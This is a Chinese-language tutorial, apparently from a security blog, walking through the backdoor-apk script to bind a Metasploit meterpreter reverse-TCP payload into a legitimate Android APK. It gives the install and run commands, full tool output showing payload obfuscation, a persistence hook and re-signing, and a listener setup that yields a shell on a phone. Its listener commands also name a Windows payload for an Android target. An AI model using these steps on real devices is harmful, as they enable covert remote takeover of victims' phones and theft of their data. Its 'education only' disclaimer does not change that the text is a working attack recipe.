安卓后门工具:backdoor-apk 教程
backdoor-apk是一个shell脚本,它简化了向任何Android APK文件添加后门程序的过程。此shell脚本的用户应具有Linux,Bash,Metasploit,Apktool,Android SDK,smali等的工作知识。此shell脚本按原样提供,不提供任何形式的担保,仅用于教育目的。
通俗的讲:backdoor-apk 从名字上我们就能知道它的用途了,没错就是用来制作 APK 后门的。这款工具使用起来非常方便,而且功能也很强大!话不多说,下面我们直接进入正题。
特别提醒:文中提及的部分技术仅供安全学习和教学用途,禁止非法使用!
1、首先,让我们对它进行安装,在安装前我们需要先安装它的一些依赖 lib 库文件:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
2、这里询问我们,对这些安装的服务,当他们更新时不再进行询问。我们选择 Yes 即可!
在完成以上依赖库的安装后接着我们就可以安装 backdoor-apk 啦!
backdoor-apk 下载、安装、使用教程
1、下载backdoor-apk
我是直接用的git下载backdoor-apk,其它方式也可以,例如:wget;
git clone https://github.com/dana-at-cp/backdoor-apk.git
2、下载完成后我们进入到其文件目录下:
cd backdoor-apk/
3、在当前目录下,我们可以看到一个脚本文件。
特别注意:我们需要提前准备一个用来绑定后门的apk文件。
./backdoor-apk.sh /root/secist.apk
选择 3 payload
LHOST:192.168.15.131
LPORT:4444
4、Android清单权限选项:
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
如何判断后门APK是否生成 成功?
以下操作过程就算是成功!
root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie
[*] Running backdoor-apk.sh v0.2.3 on Mon Oct 9 16:50:06 EDT 2017
[+] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[+] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Code/github/backdoor-apk/backdoor-apk#
5、成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.131
set lport 4444
exploit
6、同时,我将生成的带有后门的 APK 发送至我的手机,并进行安装打开!backdoor-apk
7、很快我们可以看到,我已经取得了手机的 meterpreter shell !meterpreter shell
简单输入一个,查看系统信息的命令:
sysinfo
可以看到目标系统为 安卓6 版本,内核为 linux 3.10.49 架构为 armv7l 。